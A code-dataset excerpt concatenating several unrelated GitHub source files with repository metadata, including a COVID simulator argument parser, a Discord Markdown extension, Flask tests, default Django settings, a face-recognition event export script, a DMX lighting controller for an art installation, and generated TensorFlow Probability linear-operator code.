points = np.array([[0, 0], [0, 1], [0, 2], [1, 0], [1, 1], [1, 2],[2, 0], [2, 1], [2, 3.1]])
vor = Voronoi(points)
voronoi_plot_2d(vor)
plt.show() | [
"yztrnc@gmail.com"
] | yztrnc@gmail.com |
5cc818c213c3fdee9c98e03c04fc1653d0b66336 | c2209acf2147589057955e65b56c1ed4a142c228 | /simulator/run_helper.py | 225a079607d1342fbc48f1bc25530032f3d1b646 | [
"MIT"
] | permissive | sn4B/covid-19-pandemic-simulation | d4007461633e40664ad6be535396fd388d0286ea | ab8b48f01734fe1fdb4b3429dd69adebd3b3f62d | refs/heads/master | 2022-04-20T11:38:25.756363 | 2020-04-18T20:44:07 | 2020-04-18T20:44:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,469 | py | import argparse
from simulator.parameters import *
def get_parser():
parser = argparse.ArgumentParser(description='Please feed model parameters')
parser.add_argument('--nrun', type=int, help='Number of simulations', dest=nrun_key)
parser.add_argument('--nind', type=int, help='Number of individuals', dest=nindividual_key)
parser.add_argument('--nday', type=int, help='Number of days', dest=nday_key)
parser.add_argument('--sto-house', type=int, help='Number of store per house', dest=store_per_house_key)
parser.add_argument('--nblock', type=int, help='Number of blocks in the grid', dest=nb_block_key)
parser.add_argument('--remote-work', type=float, help='Percentage of people remote working', dest=remote_work_key)
parser.add_argument('--sto-pref', type=float, help='Probability going to nearest store', dest=store_preference_key)
parser.add_argument('--p-same-house', type=float, help='"Probability" for individuals for living in the same house'
, dest=same_house_p_key)
parser.add_argument('--inn-infec', type=float, help='Initial innoculation percentage',
dest=innoculation_pct_key)
parser.add_argument('--p-house', type=float, help='Probability of house infection', dest=house_infect_key)
parser.add_argument('--p-store', type=float, help='Probability of store infection', dest=store_infection_key)
parser.add_argument('--p-work', type=float, help='Probability of workplace infection', dest=work_infection_key)
parser.add_argument('--contagion-bounds', type=int, nargs=2, help='Contagion bounds', dest=contagion_bounds_key)
parser.add_argument('--hospitalization-bounds', type=int, nargs=2, help='Hospitalization bounds',
dest=hospitalization_bounds_key)
parser.add_argument('--death-bounds', type=int, nargs=2, help='Death bounds', dest=death_bounds_key)
parser.add_argument('--immunity-bounds', type=int, nargs=2, help='Immunity bounds', dest=immunity_bounds_key)
parser.add_argument('--population-state', '--pop', help='Draw population state graph', action='store_true')
parser.add_argument('--hospitalized-cases', '--hos', help='Draw hospitalized cases graph', action='store_true')
parser.add_argument('--new-cases', '--new', help='Draw new cases graph', action='store_true')
parser.add_argument('--summary', '--sum', help='Draw a pandemic summary', action='store_true')
return parser
| [
"biossamu@gmail.com"
] | biossamu@gmail.com |
969b80ee8cc4c17a50e1e211549d04546b0cd7db | 9e0b758019d9390ac09e25acc7c9b1ddcc6cb3b2 | /discord_mdext/standard_subset.py | 085a94df9f7b88616e327f8846fcfd7ec43e36bc | [
"Unlicense"
] | permissive | tsudoko/pullcord-export | 68fc6a8c6a980ca8b1de91b5c19987956a3c3447 | 6c6b296cb3437dbbf9896573ecb3f7d00e33b411 | refs/heads/master | 2020-04-29T12:21:24.729091 | 2019-11-03T22:04:32 | 2020-01-05T18:39:43 | 176,133,774 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,020 | py | import markdown
class DiscordSubsetExtension(markdown.Extension):
def extendMarkdown(self, md):
"""Remove standard Markdown features not supported by Discord."""
md.registerExtension(self)
md.preprocessors.deregister("reference")
md.parser.blockprocessors.deregister("indent")
md.parser.blockprocessors.deregister("code")
md.parser.blockprocessors.deregister("hashheader")
md.parser.blockprocessors.deregister("setextheader")
md.parser.blockprocessors.deregister("hr")
md.parser.blockprocessors.deregister("olist")
md.parser.blockprocessors.deregister("ulist")
md.parser.blockprocessors.deregister("quote")
md.inlinePatterns.deregister("reference")
md.inlinePatterns.deregister("link")
md.inlinePatterns.deregister("image_link")
md.inlinePatterns.deregister("image_reference")
md.inlinePatterns.deregister("short_reference")
md.inlinePatterns.deregister("automail")
md.inlinePatterns.deregister("linebreak")
def makeExtension(**kwargs):
return DiscordSubsetExtension(**kwargs)
| [
"flan@flande.re"
] | flan@flande.re |
69cf78fe2c92ade2b933e5c22171f96f7cad2375 | 962dee99bceeae8d6b070cd3620ced13445db40a | /backdrop/test_webapp.py | 1d7570e72bef4addc3de4c3d4daf14fe22bf4cfd | [] | no_license | robyoung/backdroop | 6b3d86b3f7e7569ee954b5ae0b7872c1619cbe37 | 2a93463ac6792e95400b73c1ad2f6a7c31012e54 | refs/heads/master | 2018-12-28T19:20:05.226179 | 2014-04-11T08:53:14 | 2014-04-11T08:57:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,836 | py | from .webapp import app
import unittest
import json
import pymongo
class FlaskTestCase(unittest.TestCase):
def setUp(self):
app.config['TESTING'] = True
self.app = app.test_client()
def tearDown(self):
pymongo.Connection()['backdroop']['foobar'].drop()
def add_records(self):
payload = json.dumps([
{"_timestamp": "2012-12-12T12:12:12+00:00", "unique_visitors": 1234},
{"_timestamp": "2012-12-13T12:12;12+00:00", "unique_visitors": 4321},
{"_timestamp": "2012-12-21T12:12;12+00:00", "unique_visitors": 4321},
{"_timestamp": "2013-02-01T12:12;12+00:00", "unique_visitors": 4321},
])
self.app.post('/data-sets/foobar/data',
data=payload,
content_type='application/json')
def test_raw_query(self):
self.add_records()
result = self.app.get('/data-sets/foobar/data')
data = json.loads(result.data)
assert len(data) == 4
assert data[0]['_timestamp'] == "2012-12-12T12:12:12+00:00"
assert data[1]['_timestamp'] == "2012-12-13T12:12:00+00:00"
def test_group_by(self):
self.add_records()
result = self.app.get('/data-sets/foobar/data?group_by=unique_visitors')
data = json.loads(result.data)
assert len(data) == 2
assert data[0]['_count'] == 1
assert data[0]['unique_visitors'] == 1234
def test_period(self):
self.add_records()
result = self.app.get('/data-sets/foobar/data?period=week')
data = json.loads(result.data)
assert len(data) == 3
assert data[0]['_start_at'] == "2012-12-10T00:00:00+00:00"
assert data[1]['_start_at'] == "2012-12-17T00:00:00+00:00"
if __name__ == '__main__':
unittest.main()
| [
"rob.young@digital.cabinet-office.gov.uk"
] | rob.young@digital.cabinet-office.gov.uk |
4a0cf341c54b5e86925e1e4083c443883922d80b | 23e40d2056bcadb28aad88ef58efb95461516072 | /main/settings.py | aab3cf8e575662e3a8938c00d1089bb561948ca2 | [] | no_license | drewvpham/dojo_secrets | 6436335005373ab93e3dd58e5943b918313f3fa9 | 120016c86d17643c59f6e18aff84d5ccb84b52b0 | refs/heads/master | 2021-01-22T04:15:15.385267 | 2017-05-30T21:47:34 | 2017-05-30T21:47:34 | 92,445,838 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,113 | py | """
Django settings for main project.
Generated by 'django-admin startproject' using Django 1.10.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 's(u^ipke+4s%dj7x@pe0jk1i7)bki!#%n)0&=nl3$f0y6*tks0'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'apps.dojo_secrets',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'main.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'main.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
| [
"drewvpham@gmail.com"
] | drewvpham@gmail.com |
07440c9f25df6a45a8360071ab83f6fc63760930 | 355609e7d11f9bcccb1d72f3960dab197920d392 | /get_faces_events_v0.9.4.py | 73b07c412b5391ad8e8ec95b0cca3cae03753cc7 | [] | no_license | asnigirev/scripts | db82d094c6ff42ef9498d10890c76eca7fee58aa | 0527951148f3ea9308618e9d578650dd8aec0e86 | refs/heads/master | 2022-08-24T04:19:21.934572 | 2020-05-28T16:47:32 | 2020-05-28T16:47:32 | 267,643,508 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,755 | py | #!/usr/bin/python3
# Copyright (C) 2019 All rights reserved.
# Author Artem Snigirev <takeitawaytu@gmail.com>.
# -*- coding: utf-8 -*-
import sys
import os
import json
import requests
import csv
from requests.auth import HTTPBasicAuth
from datetime import datetime, timedelta
from dateutil import tz
import pytz
import getpass
print('Copyright (C) 2019 All rights reserved.\nAuthor Artem Snigirev <takeitawaytu@gmail.com>.\n\n\n\n\n')
print('Be careful, old files will be ERASED!!!\n\n')
DATETIME_FORMAT = '%Y-%m-%dT%H:%M:%S.%f'
local_tz = pytz.timezone('UTC')
verify = 'False'
output = 'result.csv'
html_output = 'face_report.html'
verbose = None
check = True
while check:
url = 'http://' + input('Please, enter server ip-address: ') + '/'
user = input('Login: ')
print('Don’t worry, the password will be typed, it’s just hidden')
passw = getpass.getpass()
print('Wait')
try:
resp = requests.post(url+'n7/n7session', auth=HTTPBasicAuth(user, passw))
result = resp.text
global n7token
n7token = result
if resp.status_code != 200:
print("\nInvalid credentials\n Try again...\n")
check = True
else:
check = False
# break
except Exception:
print("\nInvalid server address\n Try again...\n")
while True:
try:
since_date = input('Please, enter start date (Ex. YYYY-MM-DD): ')
since_time = input('Please, enter start time (Ex. hh:mm:ss): ')
since = str(since_date + 'T' + since_time + '.000')
until_date = input('Please, enter end date (Ex. YYYY-MM-DD): ')
until_time = input('Please, enter end time (Ex. hh:mm:ss): ')
until = str(until_date + 'T' + until_time + '.000')
since_timestamp = datetime.strptime(since, DATETIME_FORMAT).replace(tzinfo=tz.tzlocal())
until_timestamp = datetime.strptime(until, DATETIME_FORMAT).replace(tzinfo=tz.tzlocal())
except ValueError:
print("\nDate or Time is not correct\n Try again...\n")
else:
break
def erase_files(output, html_output):
html_header = ''
if output is not None:
with open(output, 'w', newline='') as out:
writer = csv_writer(out)
writer.writerow([
'{}'.format('first_name'),
'{}'.format('last_name'),
'{}'.format('face_id'),
'{}'.format('list_id'),
'{}'.format('similar'),
'{}'.format('channel_id'),
'{}'.format('date'),
'{}'.format('image_link'),
'{}'.format('eth_img_link')
])
out.close()
if html_output is not None:
with open(html_output, 'w', newline='') as out:
out.write(html_header)
out.close()
newpath = r'.\snapshots'
if not os.path.exists(newpath):
os.makedirs(newpath)
def csv_writer(out):
return csv.writer(out)
def get_photo(N, r, headers):
img_url = r['snapshots'][2]['path']
global html
html = url + img_url[1:]
path_to_snapshot = 'snapshots/img(' + str(N) + ').jpg'
global image_link
image_link = path_to_snapshot
img = requests.get(html, headers=headers)
with open(path_to_snapshot, 'wb') as img_file:
img_file.write(img.content)
image_link = path_to_snapshot
print('snapshot: img(' + str(N) + ').jpg - has been downloaded')
def get_ethanol(N, headers, r, face_id, html):
if r['params']['identity']['state'] == 'IDENTIFIED':
path_to_eth = url+'n7/faces/'+str(face_id)
eth_img_url = requests.get(path_to_eth, headers=headers)
result = eth_img_url.text
res = json.loads(result)
res = res['images'][0]['image']
path_to_eth_snapshot = 'snapshots/img(' + str(N) + ')ethalon.jpg'
eth_img = requests.get(url+res[1:], headers=headers)
with open(path_to_eth_snapshot, 'wb') as eth_img_f:
eth_img_f.write(eth_img.content)
elif r['params']['identity']['state'] == 'NOT_IDENTIFIED':
path_to_eth = r['snapshots'][0]['path']
path_to_eth = url + path_to_eth[1:]
path_to_eth_snapshot = 'snapshots/img(' + str(N) + ')ethalon.jpg'
eth_img = requests.get(path_to_eth, headers=headers)
with open(path_to_eth_snapshot, 'wb') as eth_img_f:
eth_img_f.write(eth_img.content)
global eth_img_link
eth_img_link = path_to_eth_snapshot
print('snapshot: eth(' + str(N) + ').jpg - has been downloaded')
def print_result(first_name, last_name, face_id, list_id, similar, channel_id, date, image_link, eth_img_link):
with open(output, 'a', newline='') as out:
writer = csv_writer(out)
writer.writerow([
'{}'.format(first_name),
'{}'.format(last_name),
'{}'.format(face_id),
'{}'.format(list_id),
'{}'.format(similar),
'{}'.format(channel_id),
'{}'.format(date),
'{}'.format(image_link),
'{}'.format(eth_img_link)
])
def build_html_headers(html_output):
html_headers = (
'<html>\n'
' <head>\n'
' <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">\n'
' </head>\n'
' <body>\n'
' <table border="1">\n'
' <tbody>\n'
' <tr>\n'
' <th>N</th>\n'
' <th>First_Name</th>\n'
' <th>Last_Name</th>\n'
' <th>Face_id</th>\n'
' <th>Facelist_id</th>\n'
' <th>Similarity</th>\n'
' <th>Channel_id</th>\n'
' <th>Time_stamp</th>\n'
' <th>Thumbnail</th>\n'
' <th>Person_photo</th>\n'
' </tr>\n'
)
with open(html_output, 'a', newline='') as out:
out.write(html_headers)
out.close()
def build_html_end(html_output):
html_end = (
' </tbody>\n'
' </table>\n'
' </body>\n'
'</html>\n'
)
with open(html_output, 'a', newline='') as out:
out.write(html_end)
out.close()
def build_html_body(N, first_name, last_name, face_id, list_id, similar, channel_id, date, path_to_snapshot, path_to_eth_snapshot, html_output):
html_str = (
' <tr align="middle">\n'
' <td>' + str(N) + '</td>\n'
' <td>' + str(first_name) + '</td>\n'
' <td>' + str(last_name) + '</td>\n'
' <td>' + str(face_id) + '</td>\n'
' <td>' + str(list_id) + '</td>\n'
' <td>' + str(similar) + '</td>\n'
' <td>' + str(channel_id) + '</td>\n'
' <td>' + str(date) + '</td>\n'
' <td>\n'
' <img style="width: 150px;" src="./' + str(path_to_snapshot) + '">\n'
' </td>\n'
' <td>\n'
' <img style="width: 150px;" src="./' + str(path_to_eth_snapshot) + '">\n'
' </td>\n'
' </tr>\n'
)
with open(html_output, 'a', newline='', encoding='utf-8') as out:
out.write(html_str)
out.close()
def get_faces(*args):
check = True
offset = 0
N = 0
while check is True:
N = N
headers = {
'Authorization': 'N7Session '+n7token
}
params = {
"limit": "240",
"offset": offset,
"order_type": "asc",
"since": since_timestamp,
"since_by_start_time": "true",
"topics": "FaceDetected",
"until": until_timestamp
}
resp = requests.get(
url+'/n7/events',
headers=headers,
params=params
)
result = resp.text
resp = json.loads(result)
cond = len(resp)
for index, r in enumerate(resp):
if r['params']['identity']['state'] == 'IDENTIFIED':
resp = r['params']['identity']['persons'][0]
first_name = resp['face']['first_name']
last_name = resp['face']['last_name']
face_id = resp['face']['id']
list_id = resp['list']['id']
similar = r['params']['identity']['persons'][0]['similarity']
channel_id = r['channel']
unc_date = r['start_time'].replace('Z', '')
unc_date = datetime.strptime(unc_date, DATETIME_FORMAT)
upd_date = local_tz.localize(unc_date)
date = datetime.strftime(upd_date.astimezone(pytz.timezone('Europe/Moscow')), DATETIME_FORMAT)
try:
get_photo(N, r, headers)
get_ethanol(N, headers, r, face_id, html)
except IndexError:
continue
elif r['params']['identity']['state'] == 'NOT_IDENTIFIED':
first_name = 'Not'
last_name = 'Identified'
face_id = '-'
list_id = '-'
similar = '-'
channel_id = r['channel']
unc_date = r['start_time'].replace('Z', '')
unc_date = datetime.strptime(unc_date, DATETIME_FORMAT)
upd_date = local_tz.localize(unc_date)
date = datetime.strftime(upd_date.astimezone(pytz.timezone('Europe/Moscow')), DATETIME_FORMAT)
try:
get_photo(N, r, headers)
get_ethanol(N, headers, r, face_id, html)
except IndexError:
continue
build_html_body(N, first_name, last_name, face_id, list_id, similar, channel_id, date, image_link, eth_img_link, html_output)
print(first_name, ' ', last_name, ', face id: ', face_id, ', facelist id: ', list_id, ', eventdate: ', date)
print_result(first_name, last_name, face_id, list_id, similar, channel_id, date, image_link, eth_img_link)
N += 1
offset += 240
if cond == 0:
check = False
# Основная функция
if __name__ == '__main__':
erase_files(output, html_output)
build_html_headers(html_output)
get_faces()
build_html_end(html_output)
input('Done, press "enter"')
| [
"51997250+asnigirev@users.noreply.github.com"
] | 51997250+asnigirev@users.noreply.github.com |
cfba4552095164906b3630255f73327a589c99c7 | d7ed341278eef549dcba6bdb4b0b3ce6062711c5 | /calc.py | f5716e289a104658c09008b53887f1a9fd5e2c88 | [] | no_license | JerryDSW/python_test | a005ba5667be441bdca16b39f32b8905dce06282 | 0ac04343a5876c00e7798c4af63b0e512aeeac40 | refs/heads/master | 2020-03-22T00:52:05.340391 | 2018-06-30T14:39:17 | 2018-06-30T14:39:17 | 139,269,930 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 138 | py | def add(x, y):
pass
def subtract(x, y):
pass
def multipy(x, y):
return
def divide(x, y):
pass
def aquare(x):
pass
| [
"JerryWangDSW@gmail.com"
] | JerryWangDSW@gmail.com |
02621e8e9db32fa0801a84b3c0bc40d5521325dd | 898c75627c084ef05153423664742a8c4a1c279b | /aurora.py | 0e13a7148864c6bf59fb98be00064ef7b1e1b13c | [] | no_license | headrotor/aurora-DMX | 6ab32a3b0aa997027c188395bb634211aee436b2 | 5abae5addd10b9a67d5eba6c30df3fd2953e4fa7 | refs/heads/master | 2016-09-06T01:14:28.006584 | 2013-10-14T03:24:29 | 2013-10-14T03:24:29 | 9,930,111 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,298 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
""" This file contains classes to deal with the irregular structure of
the Aurora artwork
"PODs" are a group of 4 DMX-32 boards, each pod can support up to
4x32=128 DMX channels; at three channels per branch or 10 branches
per board, each pod can support 40 branches.
One DMX universe can only support 4 pods, labled A,B,C,D so the fifth
"E" pod is on a separate DMX universe."""
import sys
import struct
import time
import math
import colorsys
import ConfigParser
# local classes
import DMXthread
class Pod(object):
"""Class to support a group of 4 DMX-32 boards"""
def __init__(self, name, universe):
self.name = name
self.universe = universe
self.limbs = [] # array of Limb structures
def printInfo(self):
print 'pod %s, num limbs: %d' % (self.name, len(self.limbs))
# A "Limb" is a group of branches on the same physical pipe ("limb")
# It can have anywhere from 5 to 11 branches.
class Limb(object):
"""Class to support "limb" structure in Aurora, can have 5-11 branches"""
def __init__(self, name, nbranches):
self.name = name
self.branches = [Branch(0, 0, 0, 0, (0, 0, 0)) for n in
range(nbranches)]
def printInfo(self):
print ' limb %s, num branches: %d' % (self.name,
len(self.branches))
def addBranch(self, n, branch):
self.branches[n] = branch
# A "branch" is the simplest light unit, it is a single strip of RGB
# LED and can be set to any RGB color. There are 5-11 branches per
# limb and up to 40 branches per pod.
class Branch(object):
def __init__(
self,
name,
start,
uni,
board,
channels,
):
self.name = name
self.start = start # start address of this branch
self.brindex = 0 # branch index
self.board = board # board in pod
self.universe = uni # universe of this branch from parent bd
self.channels = channels # triple of board-level channels (0-31)
if max(self.channels) > 32:
print 'ERROR: channel value out of range for branch ' + name
exit()
# calculate DMX channel from start offset plus local channel
self.DMX = [c + self.start - 1 for c in self.channels]
if max(self.DMX) > 511:
print 'WARNING: DMX value out of range for branch ' + name
exit()
# self.xypos # tuple of x, y position
def __str__(self):
return '%s index %3s, bd: %d chan: %12s DMX[%s]: %s' % (
self.name,
self.brindex,
self.board,
self.channels,
self.universe,
self.DMX,
)
def printInfo(self):
print self.__str__()
def setNextColor(self, hsv):
""" Set a new color for interpolation"""
self.lastHSV = self.thisHSV
self.thisHSV = hsv
def getTweenColor(self, factor):
"""return interpolated color from last color and this color"""
pass
def getLimbIndex(self):
"""parse name to get limb index, eg A-2-4 is limb 2 (actually
[1])"""
data = self.name.split('-')
return int(data[1]) - 1
def getBranchIndex(self):
"""parse name to get br number on limb, eg A-2-4 is branch 4
(actually [3])"""
data = self.name.split('-')
return int(data[2])
class AuroraDMX(object):
"""AuroraDMX: class to support aurora dmx from config file
Nomenclature: a pod supports 40 branches there are 5 a board
supports 10 branches, there are 20 a branch is one strip, or
three DMX channels"""
def __init__(self, cfgfile):
self.branches = [] # list of brancj structs
self.InitFromCfg(cfgfile)
self.uni0 = DMXthread.DMXUniverse(self.universes[0])
self.DMX = [self.uni0] # array of DMX devices, 1 per universe
if len(self.universes) > 1:
self.uni1 = DMXthread.DMXUniverse(self.universes[1])
self.DMX.append(self.uni1)
else:
self.uni1 = None
def TreeSend(self, dstart=0, dend=0):
self.uni0.send_buffer()
if self.uni1 is not None:
self.uni1.send_buffer()
def setChan(
self,
u,
chan,
fval,
):
""" set the given channel to the given [0-1] floating value"""
self.DMX[u].set_chan_float(chan, fval)
def setChanInt(
self,
u,
chan,
intval,
):
""" set the given channel to the given [0-255] int value"""
# print "setting chan %d to %d" % (chan,intval)
# sys.stdout.flush()
self.DMX[u].set_chan_int(chan, intval)
def setBranchInt(self, branch, rgb):
""" set the three branch channels to the given RGB values """
u = self.branches[branch].universe
if u < len(self.DMX):
self.setChanInt(u, self.branches[branch].DMX[0], rgb[0])
self.setChanInt(u, self.branches[branch].DMX[1], rgb[1])
self.setChanInt(u, self.branches[branch].DMX[2], rgb[2])
else:
# print "Warning: universe %d out of range" % u
pass
def setBranchRGB(self, branch, rgb):
""" set the three branch channels to the given RGB values """
u = self.branches[branch].universe
if u < len(self.DMX):
self.setChan(u, self.branches[branch].DMX[0], rgb[0])
self.setChan(u, self.branches[branch].DMX[1], rgb[1])
self.setChan(u, self.branches[branch].DMX[2], rgb[2])
else:
# print "Warning: universe %d out of range" % u
pass
def setBranchHSV(self, branch, hsv):
""" set the branch to the given hue, sat, and value (bright) triple"""
self.setBranchRGB(branch, colorsys.hsv_to_rgb(hsv[0], hsv[1], hsv[2]))
def InitFromCfg(self, cfgfile):
""" initialize all data structures from configuration file """
self.cfg = ConfigParser.RawConfigParser()
self.cfg.read(cfgfile)
# how many universes? read any config items starting with "universe"
universes = [item[1] for item in self.cfg.items('DMX')
if item[0].startswith('universe')]
if len(universes) < 1:
print 'no universes detected in config file! Bye.'
exit()
self.universes = universes
print repr(universes)
board_count = 0
# get a list of pods
podnames = self.cfg.get('pods', 'pods')
podnames = podnames.split(',')
self.pods = []
for p in podnames:
pname = 'pod' + p
uni = self.cfg.getint(pname, 'universe')
new_pod = Pod(pname, uni)
# first, get start addresses of all boards
nboards = len([item[1] for item in self.cfg.items(pname)
if item[0].startswith('board')])
starts = [0] * nboards
bnames = [(n, 'board' + str(n)) for n in range(nboards)]
for (n, b) in bnames:
starts[n] = self.cfg.getint(pname, b)
#print 'pod ' + new_pod.name
# get ordered list of limbs
lnames = ['branch-1', 'branch-2', 'branch-3', 'branch-4',
'branch-5']
for lname in lnames: # for each limb
# get list of branch names for this limb (ending with A, eg)
lbrnames = [item[0] for item in self.cfg.items(pname)
if item[0].startswith(lname)]
nbranches = len(lbrnames)
if nbranches > 0:
# now we have list of branch names for this limb.
# make a new limb with this many branches
limb = Limb(p + lname, nbranches)
# now for every branch in this limb, add it to the Limb
for brname in lbrnames:
data = self.cfg.get(pname, brname)
data = [int(k) for k in data.split(',')]
# data is a list of [board, rchan,bchan,gchan]
board = data[0]
start = starts[board] # start address for this branch
new_branch = Branch(p + brname, start, uni,
board, (data[1], data[2], data[3]))
data = brname.split('-')
index = int(data[2])
# print "adding branch %d" % index + new_branch.name
limb.addBranch(index, new_branch)
sys.stdout.flush()
new_pod.limbs.append(limb)
self.pods.append(new_pod)
# all boards read in. Now create list of limbs and branches[]
brcount = 0
self.branches = []
self.limbs = []
self.limblist = []
for pod in self.pods:
self.limbs.append(pod.limbs)
self.limblist.extend(pod.limbs)
for lb in pod.limbs:
for br in lb.branches:
br.brindex = brcount
self.branches.append(br)
brcount += 1
def print_config(self):
""" print the dmx configuration """
for pod in self.pods:
for lb in pod.limbs:
print '%s limb %s ' % (pod.name, lb.name)
for br in lb.branches:
br.printInfo()
sys.stdout.flush()
# if running from the console, do some test stuff
if __name__ == '__main__':
# make the DMX data structure from the config file
treeDMX = AuroraDMX('mapDMX.cfg')
# print it out for debug
if sys.argv[1] == 'c':
treeDMX.print_config()
exit()
if len(sys.argv) < 4:
print """usage: aurora.py l b color
sets limb l on branch b (ints) to color where
color is one of red, blue, green, white, off, cyan, magenta, yellow"""
exit()
if sys.argv[3][0] == 'r':
color = (255, 0, 0)
elif sys.argv[3][0] == 'g':
color = (255, 0, 0)
elif sys.argv[3][0] == 'b':
color = (0, 0, 255)
elif sys.argv[3][0] == 'w':
color = (255, 255, 255)
elif sys.argv[3][0] == 'o':
color = (0, 0, 0)
elif sys.argv[3][0] == 'c':
color = (0, 255, 255)
elif sys.argv[3][0] == 'm':
color = (255, 0, 255)
elif sys.argv[3][0] == 'y':
color = (255, 255, 0)
else:
print 'unrecognized color "%s"' % sys.argv[3]
exit()
limb = int(sys.argv[1])
branch = int(sys.argv[2])
l = treeDMX.limblist[limb]
b = l.branches[branch]
print str(b)
treeDMX.setBranchRGB(b.brindex, color)
sys.stdout.flush()
treeDMX.TreeSend()
time.sleep(0.1) # give threads a chance to work
| [
"rrmutt@gmail.com"
] | rrmutt@gmail.com |
b82c5691d93f85bfb3f0a5405b79ca804500f2c4 | 2e8ff2eb86f34ce2fc330766906b48ffc8df0dab | /tensorflow_probability/python/internal/backend/numpy/gen/linear_operator_block_diag.py | 6aeec93a59471c9f85ff8fffe030e4d7812c59de | [
"Apache-2.0"
] | permissive | wataruhashimoto52/probability | 9613f9a3cc685ff1a20643c4a05a48f9cf0fe1ae | 12e3f256544eadea6e863868da825614f4423eb0 | refs/heads/master | 2021-07-16T18:44:25.970036 | 2020-06-14T02:48:29 | 2020-06-14T02:51:59 | 146,873,495 | 0 | 0 | Apache-2.0 | 2018-08-31T09:51:20 | 2018-08-31T09:51:20 | null | UTF-8 | Python | false | false | 28,763 | py | # Copyright 2020 The TensorFlow Probability Authors. All Rights Reserved.
# @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
# THIS FILE IS AUTO-GENERATED BY `gen_linear_operators.py`.
# DO NOT MODIFY DIRECTLY.
# @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
# pylint: disable=g-import-not-at-top
# pylint: disable=g-direct-tensorflow-import
# pylint: disable=g-bad-import-order
# pylint: disable=unused-import
# pylint: disable=line-too-long
# pylint: disable=reimported
# pylint: disable=g-bool-id-comparison
# pylint: disable=g-statement-before-imports
# pylint: disable=bad-continuation
# pylint: disable=useless-import-alias
# pylint: disable=property-with-parameters
# pylint: disable=trailing-whitespace
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Create a Block Diagonal operator from one or more `LinearOperators`."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow_probability.python.internal.backend.numpy import ops as common_shapes
from tensorflow_probability.python.internal.backend.numpy import dtype as dtypes
from tensorflow_probability.python.internal.backend.numpy import ops
from tensorflow_probability.python.internal.backend.numpy.gen import tensor_shape
from tensorflow_probability.python.internal.backend.numpy import numpy_array as array_ops
from tensorflow_probability.python.internal.backend.numpy import debugging as check_ops
from tensorflow_probability.python.internal.backend.numpy import control_flow as control_flow_ops
from tensorflow_probability.python.internal.backend.numpy.gen import linear_operator
from tensorflow_probability.python.internal.backend.numpy.gen import linear_operator_algebra
from tensorflow_probability.python.internal.backend.numpy.gen import linear_operator_util
# from tensorflow.python.util.tf_export import tf_export
__all__ = ["LinearOperatorBlockDiag"]
# @tf_export("linalg.LinearOperatorBlockDiag")
class LinearOperatorBlockDiag(linear_operator.LinearOperator):
"""Combines one or more `LinearOperators` in to a Block Diagonal matrix.
This operator combines one or more linear operators `[op1,...,opJ]`,
building a new `LinearOperator`, whose underlying matrix representation is
square and has each operator `opi` on the main diagonal, and zero's elsewhere.
#### Shape compatibility
If `opj` acts like a [batch] square matrix `Aj`, then `op_combined` acts like
